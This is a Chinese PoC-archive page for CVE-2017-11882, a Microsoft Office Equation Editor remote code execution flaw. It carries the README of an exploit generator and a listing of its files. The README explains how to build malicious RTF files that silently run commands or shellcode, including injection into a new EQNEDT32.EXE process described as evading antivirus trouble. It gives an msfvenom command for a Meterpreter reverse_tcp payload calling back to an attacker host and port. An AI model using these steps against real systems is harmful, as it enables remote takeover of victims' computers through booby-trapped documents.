关联漏洞
标题:
Microsoft Office 安全漏洞
(CVE-2017-11882)
描述:Microsoft Office 2007 SP3等都是美国微软(Microsoft)公司开发的办公软件套件产品。 Microsoft Office中存在远程代码执行漏洞,该漏洞源于程序没有正确的处理内存中的对象。远程攻击者可借助特制的文件利用该漏洞在当前用户的上下文中执行任意代码。以下版本受到影响:Microsoft Office 2007 SP3,Microsoft Office 2010 SP2,Microsoft Office 2013 SP1,Microsoft Office 2016。
描述
CVE-2017-11882 Exploit accepts over 17k bytes long command/code in maximum.
介绍
# CVE-2017-11882 Exploit
CVE-2017-11882 Exploit accepts over 17k bytes long command/code in maximum.
For remote command execution,this exploit will call WinExec with SW_HIDE and call ExitProcess after WinExec returns.
For remote code execution,this exploit just jmp to code.
I cannot find a reference for the object structure...so I cannot change the file length for arbitrary length code execution..:(
But I do think 17k bytes is really enough. Python script will detect the payload size you need and choose the correct payload template.
**Caution: RCE will stuck winword process if you don't migrate to another process!**
Currently this exploit will inject your shellcode to new EQNEDT32.EXE process if you specify **-i** flag. **This operation is suspicious to AV but it won't stuck the word process.**
## Usage
```
usage: CVE-2017-11882.py [-h] -c CMD [-t {0,1}] [-i INJECT] -o OUTPUT
Exploit for CVE-2017-11882 @unamer(https://github.com/unamer/CVE-2017-11882)
optional arguments:
-h, --help show this help message and exit
-c CMD, --cmd CMD Command or shellcode file to run in target system
(Must be shorter than 17967 bytes!!)
-t {0,1}, --type {0,1}
Type (0:shellcode 1:command, default=1)
-i INJECT, --inject INJECT
Inject shellcode to new process
-o OUTPUT, --output OUTPUT
Output exploit rtf
```
Example:
For remote command execution
```
CVE-2017-11882.py -c cmd.exe -o test.rtf
```
For remote code execution
1. Generate some shellcode
```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.115 LPORT=2333 -o ./sc.bin
```
2. Generate exploit
```
CVE-2017-11882.py -c sc.bin -t 0 -i 1 -o test.rtf
```
## Debug
1. Set debugger value to your debugger path in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EQNEDT32.EXE
2. Build an exploit and run it.
3. Set break point at 0x41165f
4. This break point will be hit twice, at second time the payload will be executed after this function returned.
## Reference
1. https://github.com/embedi/CVE-2017-11882
2. https://embedi.com/files/white-papers/skeleton-in-the-closet.pdf
3. https://0patch.blogspot.co.id/2017/11/did-microsoft-just-manually-patch-their.html
文件快照
[4.0K] /data/pocs/1fc034dfd7c4ad415dfa6a9c35c1000681a56e2e
├── [ 45K] CVE-2017-11882.py
├── [1.0K] LICENSE
├── [2.3K] README.md
└── [ 11K] shellcode.c
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。